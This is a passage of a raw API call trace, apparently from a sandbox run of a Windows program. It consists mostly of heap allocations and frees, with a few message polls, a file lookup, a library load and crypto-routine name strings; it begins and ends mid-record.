[0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18d0 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1920 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bca00 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e750 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0244.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e908 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0244.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e660 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba660 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dff8 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0244.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e6b0 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfa8 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0244.163] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e7f0 [0244.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed40 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0244.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5a0 | out: hHeap=0x8a0000) returned 1 [0244.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed68 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3a8 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1910 [0244.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0244.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed90 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3a8 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0244.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3a8 | out: hHeap=0x8a0000) returned 1 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2edb8 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3a8 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1860 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ede0 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1860 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19e0 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee08 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19e0 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee30 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2430 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0244.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee58 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0244.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee80 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24b0 [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eea8 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0244.166] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFindFileData=0x87f4c0 | out: lpFindFileData=0x87f4c0*(dwFileAttributes=0x1ec00a0, ftCreationTime.dwLowDateTime=0x18907, ftCreationTime.dwHighDateTime=0x773d1ecd, ftLastAccessTime.dwLowDateTime=0x7e9791, ftLastAccessTime.dwHighDateTime=0xfffffffe, ftLastWriteTime.dwLowDateTime=0x87f4e4, ftLastWriteTime.dwHighDateTime=0x1e800a1, nFileSizeHigh=0x18907, nFileSizeLow=0xc000000f, dwReserved0=0x87f7c8, dwReserved1=0x8a7560, cFileName="\x0f쀀\x08", cAlternateFileName="¢\x87ဓ+\x10")) returned 0xffffffff [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2eea8 | out: hHeap=0x8a0000) returned 1 [0244.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0244.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eea8 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24a0 [0244.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eed0 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7f68 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0244.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f68 | out: hHeap=0x8a0000) returned 1 [0244.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.167] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eef8 [0244.167] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0244.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2eef8 | out: hHeap=0x8a0000) returned 1 [0244.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c7f68 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7f8 [0244.168] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e24c0 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2420 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3f0 [0244.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3f0 | out: hHeap=0x8a0000) returned 1 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c7f98 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0244.168] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f98 | out: hHeap=0x8a0000) returned 1 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0244.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0xc42358 [0244.169] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eef8 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7f98 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24c0 [0244.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f98 | out: hHeap=0x8a0000) returned 1 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef20 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7f98 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c68 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0244.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c68 | out: hHeap=0x8a0000) returned 1 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef48 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c68 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c50 [0244.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.169] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c68 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef48 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.170] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2420 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.170] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2420 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3f0 [0244.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3f0 | out: hHeap=0x8a0000) returned 1 [0244.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef48 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e2420 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef70 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c68 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2330 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9c7c50 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef98 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c80 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2330 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c80 | out: hHeap=0x8a0000) returned 1 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2efc0 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c80 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0244.171] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0244.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2410 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2410 | out: hHeap=0x8a0000) returned 1 [0244.171] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c80 | out: hHeap=0x8a0000) returned 1 [0244.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2efc0 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef98 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2420 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef48 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c68 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ef70 | out: hHeap=0x8a0000) returned 1 [0244.172] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef70 [0244.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c68 [0244.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2420 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c68 | out: hHeap=0x8a0000) returned 1 [0244.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ef48 [0244.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c68 [0244.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c50 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2330 | out: hHeap=0x8a0000) returned 1 [0244.172] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0244.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e78 | out: hHeap=0x8a0000) returned 1 [0244.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3f0 | out: hHeap=0x8a0000) returned 1 [0244.173] HeapFree (in: 